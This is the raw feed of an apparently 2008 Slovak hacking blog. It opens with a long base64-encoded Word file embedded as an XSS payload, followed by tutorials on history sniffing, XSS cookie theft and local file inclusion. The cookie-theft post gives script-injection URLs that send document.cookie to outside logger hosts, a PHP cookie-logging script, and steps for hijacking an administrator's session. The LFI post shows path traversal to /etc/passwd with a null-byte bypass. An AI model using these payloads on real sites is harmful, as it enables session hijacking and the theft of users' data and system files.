AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAIAAAADAAAABAAAAAUAAAAGAAAABwAAAAgAAAD+////CgAAAAsAAAAMAAAADQAAAA4AAAAPAAAAEAAAAP7///8SAAAAEwAAABQAAAAVAAAAFgAAABcAAAAYAAAA/v///xoAAAAbAAAAHAAAAB0AAAAeAAAAHwAAACAAAAD+////IgAAACMAAAAkAAAAJQAAACYAAAAnAAAAKAAAAP7////9////KwAAAP7////+/////v////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9SAG8AbwB0ACAARQBuAHQAcgB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAFAf//////////AwAAAAYJAgAAAAAAwAAAAAAAAEYAAAAAAAAAAAAAAADgLMSCN97GAS0AAACAAAAAAAAAAEQAYQB0AGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAIB////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQAAAAAQAAAAAAAAMQBUAGEAYgBsAGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAgEBAAAABgAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAABAAAAAAAABXAG8AcgBkAEQAbwBjAHUAbQBlAG4AdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGgACAQIAAAAFAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuEAAAAAAAAAUAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAIB////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGQAAAAAQAAAAAAAABQBEAG8AYwB1AG0AZQBuAHQAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAAAAAAAAAAAADgAAgEEAAAA//////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhAAAAABAAAAAAAAABAEMAbwBtAHAATwBiAGoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgACAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAP7///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8BAP7/AwoAAP////8GCQIAAAAAAMAAAAAAAABGHwAAAE1pY3Jvc29mdCBPZmZpY2UgV29yZCBEb2N1bWVudAAKAAAATVNXb3JkRG9jABAAAABXb3JkLkRvY3VtZW50LjgA9DmycQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo=&quot;&gt;data:application/msword;base64,0M&amp;amp;&lt;/a&gt;&lt;/pre&gt;Neviem ako na kód budú reagovať ostatné prehliadača ale Firefox by s tým problém mať nemal a myslím že Opera tiež nie.&lt;br /&gt;&lt;br /&gt;Source: &lt;a href=&quot;http://www.gnucitizen.org/&quot;&gt;pdp&lt;/a&gt;</description><link>http://webprotected.blogspot.com/2008/03/self-contained-xss-toky.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-4386594493725025569</guid><pubDate>Sat, 23 Feb 2008 14:50:00 +0000</pubDate><atom:updated>2008-03-30T14:30:28.945+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">JavaScript</category><title>JavaScript Link Scanner</title><description>Scanner rozpozná či ste už navštívily webovú stránku uvedenú v textboxe, ak áno, priradí k nej booleovskú hodnotu true a naopak ak ste na nej ešte neboli, zobrazí sa vám false.Fičať by to malo na IE 6.0 7.0 , FireFoxe a  aj v Opere.Bohužiaľ blogspot má automatické riadkovanie (&amp;lt;br&amp;gt;) a tak som mohol uviesť do textboxu iba jeden príklad, keby som uviedol viac hádzalo by tam &amp;lt;br&amp;gt;, to ale nič nemení na veci, linky na scan si tam môžte doplniť sami.&lt;br /&gt;&lt;br /&gt;&lt;label for=&quot;links&quot;&gt;linky&lt;/label&gt;&lt;br /&gt;&lt;form&gt;&lt;textarea id=&quot;links&quot; name=&quot;links&quot; cols=&quot;50&quot; rows=&quot;7&quot;&gt;http://www.google.com&lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;&lt;label for=&quot;result&quot;&gt;výsledok&lt;/label&gt;&lt;br /&gt;&lt;textarea id=&quot;result&quot; name=&quot;result&quot; cols=&quot;50&quot; rows=&quot;7&quot;&gt;&lt;/textarea&gt;&lt;br /&gt;&lt;input class=&quot;button&quot; name=&quot;scan&quot; value=&quot;skenuj&quot; onclick=&quot;scan_with_target_form(this.form)&quot; type=&quot;button&quot;&gt;&lt;input name=&quot;reset&quot; value=&quot;vyčisti&quot; type=&quot;reset&quot;&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;Zdrojový kód Petka Petkova si môžte stiahnuť &lt;a href=&quot;http://kenny.own.cz/link%20scanner.js&quot;&gt;tu&lt;/a&gt;&lt;br /&gt;&lt;script src=&quot;http://kenny.own.cz/link%20scanner.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;&lt;br /&gt;&lt;script src=&quot;http://kenny.own.cz/caller.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;</description><link>http://webprotected.blogspot.com/2008/02/javascript-link-scanner.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-9089445733554261612</guid><pubDate>Sat, 16 Feb 2008 10:59:00 +0000</pubDate><atom:updated>2008-07-28T22:35:25.250+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">XSS</category><title>Kradneme sušienky</title><description>&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(255, 0, 0);font-family:courier new;font-size:130%;&quot;  &gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Cookie Stealing with non-persistent xss&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(255, 0, 0);font-family:courier new;font-size:130%;&quot;  &gt;&lt;br /&gt;&lt;/span&gt;No poďme hneď na vec. Ako prvé si samozrejme musíme nájsť fugu v url na dotyčnom webe. Tu máme našu:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;&lt;code class=&quot;something&quot;&gt;http://www.example.sk/index.php?paper&amp;amp;name=&amp;lt;script&amp;gt;alert(xss);&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;toto je samozrejme ten úplne najjdenoduchší pripad využitia xss a často krát budete musieť použiť tvz. bypassy alebo zakódovať url, ale to nieje gro tohoto článku.&lt;br /&gt;Môžme si nechať vypísať svoje cookies&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;&lt;code class=&quot;something&quot;&gt;http://www.example.sk/index.php?paper&amp;amp;name=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;týmto by sme samozrejme nič nezískali, chýba nám nejaký skript ktorý by umožňoval odchytávať prichádzajúce dáta a ako už niektorí možno tušia, je to &lt;a href=&quot;http://ccl.whiteacid.org/&quot;&gt;Cookie Logger&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt; . Po absolvovaní registrácie vám bude pridelené vaše ID ktoré ochvíľu použijeme v tvare:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt; http://ccl.whiteacid.org/log.php?&lt;/span&gt;&lt;strong style=&quot;font-weight: normal; color: rgb(0, 153, 0);&quot;&gt;598648&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;zeleným je vyznačené ID&lt;/span&gt;&lt;/span&gt;.&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt; Sušienky zašleme pomocou &lt;span style=&quot;font-family:courier new;&quot;&gt;location.href&lt;/span&gt; a príjmeme &lt;span style=&quot;font-family:courier new;&quot;&gt;document.cookie .&lt;span style=&quot;font-family:arial;&quot;&gt; Url bude teda vypadať približne takto&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;code class=&quot;something&quot;&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;http://www.example.sk/index.php?paper&amp;amp;name=&amp;lt;script&amp;gt;location.href=&quot;http://ccl.whiteacid.org/log.php?598648&quot;+document.cookie&amp;lt;/script&amp;gt;&lt;script&gt;location.href=&quot;http://ccl.whiteacid.org/log.php?&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;strong style=&quot;font-weight: normal; color: rgb(51, 51, 255);&quot;&gt;598648&lt;/strong&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;&quot;+document.cookie&lt;/script&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-size:130%;&quot;&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-weight: bold;font-family:courier new;&quot; &gt;Cookie Stealing with persistent xss&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);font-family:arial;&quot; &gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;Tu je to už o niečo tažšie na uskutočnenie a veľa vecí nemusí výsť podľa vaších predstáv. Najprv si musíme nájsť nejakú návštevnú knihu/fórum/diskusiu, dačo kde by sme mohli aplikovať JavaScript.&lt;br /&gt; V prvom rade si vytvoríme súbor, ktorý bude obsahovať&lt;/span&gt;&lt;/span&gt;:&lt;br /&gt;&lt;pre style=&quot;font-family: arial; color: rgb(51, 51, 255);&quot;&gt; &amp;lt;?php                   &lt;br /&gt;$cookie = $HTTP_GET_VARS[&quot;cookie&quot;];&lt;br /&gt;$file = fopen(&#39;logger.txt&#39;, &#39;a&#39;);&lt;br /&gt;fwrite($file, $cookie . &quot;\n\n&quot;);&lt;br /&gt;?&amp;gt; &lt;/pre&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt;súbor uložíte napríklad ako zlodej.php, následne umiestnite na váš server a nastavte atribút 777 aby sa dalo doňho zapisavať.&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt;Do vstupu (guestbook, diskusia, ..) vložíme približne takýto skript, ako som už povedal, je častokrát potrebné skript ušiť na mieru, preto toto berte viacmenej len ako malý ťahák.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size:130%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;code class=&quot;something&quot;&gt;&amp;lt;script&amp;gt;document.location=&quot;http://www.mojserver.sk/zlodej.php?cookie=&quot;+document.cookie&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt;Nuž, teraz musíme len čakať kým sa nám nejaký user alebo ešte lepšie &lt;/span&gt;&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt;&lt;span&gt;&lt;span&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;administrátor pozrie do &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;diskusie kde je skript vložený, akonáhle to spravý, &lt;/span&gt;&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt;&lt;span&gt;&lt;span&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;jeho cookies sa nám odošlú na náš logger &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;skadiaľ si ich vyzdvihneme, prepíšeme za tie naše a prihlásime sa pod stealnutými sušienkami&lt;/span&gt;. Takže ako vidíte, xss nieje kozmetická chyba, za ktorú ju mnoho programátorov považuje, ale naozaj ide o závažnú zraniteľnosť.</description><link>http://webprotected.blogspot.com/2008/02/1.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-894842190609053863</guid><pubDate>Sun, 10 Feb 2008 13:03:00 +0000</pubDate><atom:updated>2008-07-29T11:38:34.327+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><title>Local File Inclusion</title><description>&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Tak v skratke Local File Inclusion (LFI)  je metóda pomocou ktorej si môžeme zobraziť obsah, ktorý by sme za normálnych okolností nevideli.&lt;br /&gt;&lt;br /&gt;Ok, máme webovú stránku:&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;http://www.example.sk/index.php?post=options.php&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;a skúsime otvoriť adresár pomocou &lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;../&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;http://www.example.sk/index.php?post=../&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;ak máme práva na zobrazovanie tohto adresára načítajú sa nám súbory, ktoré sú v ňom uložené, to je ale veľmi nepravdepodobné a stránka nám vráti chybovú hlášku. Skúsme si teraz načítať súbor /etc/passwd.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;http://www.example.sk/index.php?post=&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span style=&quot;font-family:arial;&quot;&gt;../.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span style=&quot;font-family:arial;&quot;&gt;./&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span style=&quot;font-family:arial;&quot;&gt;../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;umiestnenie súboru zistíte pomocou ../ a to tak, že budete postupne pridávať až sa vám načítajú užívateľské mená (/etc/passwd), samozrejme ak je webová stránka náchylná na tento typ útoku.&lt;br /&gt; Ďalej môžme použiť bypass null byte ktorého hexa kód je&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span style=&quot;font-family:arial;&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;%oo a v našom prípade výsledná url bude vypadať takto:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;http://www.example.sk/index.php?post=&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(51, 51, 255);font-size:100%;&quot; &gt;&lt;span 